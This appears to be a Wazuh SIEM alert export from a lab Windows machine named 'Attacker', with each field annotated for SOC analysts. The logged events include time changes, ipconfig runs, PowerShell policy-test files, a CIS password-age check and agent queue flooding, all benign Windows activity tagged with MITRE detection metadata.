data.win.system.systemTime: 2025-04-24T22:32:01.6175627Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43812 Incremental log record number – handy for timeline order.
data.win.system.processID: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 14792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The system time was changed.
Subject:
Security ID: S-1-5-19
Account Name: LOCAL SERVICE
Account Domain: NT AUTHORITY
Logon ID: 0x3E5
Process Information:
Process ID: 0x1c48
Name: C:\Windows\System32\svchost.exe
Previous Time: 2025-04-24T22:32:00.197033200Z
New Time: 2025-04-24T22:32:01.616986800Z
This event is generated when the system time is changed. It is normal for the Windows Time Service, which runs with System privilege, to change the system time on a regular basis. Other system time changes may be indicative of attempts to tamper with the computer." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-19 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: LOCAL SERVICE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.previousTime: 2025-04-24T22:32:00.1970332Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.newTime: 2025-04-24T22:32:01.6169868Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 0x1c48 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533929.512405 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4616 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12288 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:32:01.6277365Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43813 Incremental log record number – handy for timeline order.
data.win.system.processID: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 14792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The system time was changed.
Subject:
Security ID: S-1-5-19
Account Name: LOCAL SERVICE
Account Domain: NT AUTHORITY
Logon ID: 0x3E5
Process Information:
Process ID: 0x1c48
Name: C:\Windows\System32\svchost.exe
Previous Time: 2025-04-24T22:32:01.625752900Z
New Time: 2025-04-24T22:32:01.626929900Z
This event is generated when the system time is changed. It is normal for the Windows Time Service, which runs with System privilege, to change the system time on a regular basis. Other system time changes may be indicative of attempts to tamper with the computer." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-19 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: LOCAL SERVICE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.previousTime: 2025-04-24T22:32:01.6257529Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.newTime: 2025-04-24T22:32:01.6269299Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 0x1c48 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Suspicious Windows cmd shell execution Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92032 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087', 'T1059.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery', 'Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery', 'Windows Command Shell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533930.515610 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:02.0990286Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 212287 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-17 16:37:01.957
ProcessGuid: {94294ddc-2e2d-6801-e307-000000000e00}
ProcessId: 7128
Image: C:\Windows\System32\ipconfig.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: IP Configuration Utility
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: ipconfig.exe
CommandLine: C:\WINDOWS\system32\ipconfig /renew
CurrentDirectory: C:\Windows\System32\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B
ParentProcessGuid: {94294ddc-2e25-6801-d807-000000000e00}
ParentProcessId: 4044
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:37:01.957 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-2e2d-6801-e307-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 7128 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\ipconfig.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: IP Configuration Utility No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: ipconfig.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\ipconfig /renew No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Windows\\System32\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-2e25-6801-d807-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 4044 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\cmd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533941.521070 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:58.3562531Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 213065 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:37:58.354
ProcessGuid: {94294ddc-2e5b-6801-fa07-000000000e00}
ProcessId: 12712
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_vmq431i2.0u4.ps1
CreationUtcTime: 2025-04-17 16:37:58.354
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:37:58.354 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-2e5b-6801-fa07-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vmq431i2.0u4.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-17 16:37:58.354 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: License activation (slui.exe) failed. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60646 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533946.523838 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 8198 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:32:19.2047110Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2396 Incremental log record number – handy for timeline order.
data.win.system.processID: 1832 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: ERROR TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "License Activation (slui.exe) failed with the following error code:
hr=0x80004005
Command-line arguments:
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: hr=0x80004005, RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from passed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from passed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from passed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19012 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['1.1.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['5.2'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533950.526135 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26001 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting defines how long a user can use their password before it expires. Values for this policy setting range from 0 to 999 days. If you set the value to 0, the password will never expire. Because attackers can crack passwords, the more frequently you change the password the less opportunity an attacker has to use a cracked password. However, the lower this value is set, the higher the potential for an increase in calls to help desk support due to users having to change their password or forgetting which password is current. The recommended state for this setting is 365 or fewer days, but not 0. Note: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: The longer a password exists the higher the likelihood that it will be compromised by a brute force attack, by an attacker gaining general knowledge about the user, or by the user sharing the password. Configuring the Maximum password age setting to 0 so that users are never required to change their passwords is a major security risk because that allows a compromised password to be used by the malicious user for as long as the valid user has authorized access. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to 365 or fewer days, but not 0: Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Maximum password age Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 1.1.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 5.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['net.exe accounts'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'net.exe accounts' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: passed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Agent event queue is full. Events may be lost. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 203 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['wazuh', 'agent_flooding'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533961.531836 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: wazuh: Agent buffer: 'full'. The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.parent: wazuh Parent decoder used – for nested parsing.
decoder.name: wazuh Name of the Wazuh decoder that parsed this raw log.
data.level: full Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.
location: wazuh-agent Which log source produced the event (e.g., sysmon, auditd).
rule.description: Agent event queue is flooded. Check the agent configuration. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 204 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['wazuh', 'agent_flooding'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533975.532081 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: wazuh: Agent buffer: 'flooded'. The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.parent: wazuh Parent decoder used – for nested parsing.
decoder.name: wazuh Name of the Wazuh decoder that parsed this raw log.
data.level: flooded Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.
location: wazuh-agent Which log source produced the event (e.g., sysmon, auditd).
rule.description: Scripting file created under Windows Temp or User folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92200 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059', 'T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution', 'Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.532353 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:47:59.1079756Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 215891 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:47:59.099
ProcessGuid: {94294ddc-4855-6800-0605-000000000e00}
ProcessId: 8224
Image: C:\WINDOWS\system32\taskhostw.exe
TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\CL_Utility.ps1
CreationUtcTime: 2025-04-17 16:47:59.099
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:47:59.099 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
